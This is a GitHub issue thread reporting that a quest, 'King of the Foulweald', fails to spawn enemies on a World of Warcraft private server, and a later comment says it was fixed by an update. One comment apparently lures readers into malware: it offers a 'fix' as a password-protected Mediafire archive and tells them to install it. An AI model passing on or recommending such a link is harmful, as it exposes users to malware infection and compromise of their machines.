### ISSUE TITLE
[QUEST] - King of the Foulweald

### ISSUE THREAD

**Issue by chrisdomaub-dev** [gamefreedomgit/Maelstrom#6119]
[//]: # (REMBEMBER! Add links to things related to the bug using for example:)
[//]: # (https://www.wowhead.com/cata)

**Description:**
I have already put 3 banners, but nothing happens, it should summon up fulborgs and its chief.

**How to reproduce:**
get the quest King of the Foulweald, go to the mound indicated, place banner, and wait.

**How it should work:**
when you put the banner in the foulweald totem mound, the fulborg should start attacking and after some time, Chief Murgut should show up.

**Database links:**

![image](https://github.com/user-attachments/assets/ce4185d6-307d-42dd-aad8-2aa67b7c7b3f)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by PanJanuszek** [comment]
Fixed after update
